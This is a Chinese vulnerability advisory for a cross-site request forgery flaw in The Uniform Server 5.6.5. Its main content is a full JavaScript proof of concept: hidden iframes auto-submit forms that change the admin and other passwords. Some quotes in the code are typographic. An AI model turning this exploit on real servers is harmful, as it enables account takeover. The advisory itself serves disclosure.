The Uniform Server多个页面跨站请求伪造漏洞

发表评论 (0) 查看评论

受影响系统:

Uniform Server Development Team The Uniform Server 5.6.5

描述:

The Uniform Server是一个可以运行在任何的基于Windows操作系统上的WAMP软件包。

The Uniform Server没有执行有效性检查便允许用户通过HTTP请求执行某些操作,远程攻击者可以通过向apsetup.php、psetup.php、sslpsetup.php、mqsetup.php等脚本POST请求执行跨站请求伪造攻击,更改管理员口令。

<*来源:John Leitch
  
  链接:http://secunia.com/advisories/39913
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<html>
<head>
    <script type="text/javascript">
        window.onload = function() {
            var url = ‘http://localhost/apanel’;
            
            var xsrs = [
                {
                    "action": url + "/apsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "apuser", "value": "new_username" },
                        { "name": "appass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/psetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/sslpsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/mqsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "qpass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                }
            ];

            for (var x = 0; x < xsrs.length; x++) {
                var attackFrame = document.createElement(‘iframe’);

                var html = ‘<html><body><form action="’ + xsrs[x].action + ‘" ‘ +
                    ‘method="’ + xsrs[x].method + ‘">’;

                for (var y = 0; y < xsrs[x].fields.length; y++) {
                    html += ‘<input type="’ +
                        (xsrs[x].fields[y].type != null ?
                            xsrs[x].fields[y].type : ‘hidden’) + ‘" ‘ +
                        ‘name="’ + xsrs[x].fields[y].name + ‘" ‘ +
                        ‘value="’ + xsrs[x].fields[y].value + ‘" />’;
                }

                html += ‘</form><script>’ + xsrs[x].submitCall + ‘\x3c/script></body></html>’;

                document.body.appendChild(attackFrame);

                attackFrame.contentDocument.write(html);
            }
        }
    </script>
</head>
<body>
</body>
</html>

建议:

厂商补丁:

Uniform Server Development Team
——————————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.uniformserver.com/

发表评论?

0 条评论。

发表评论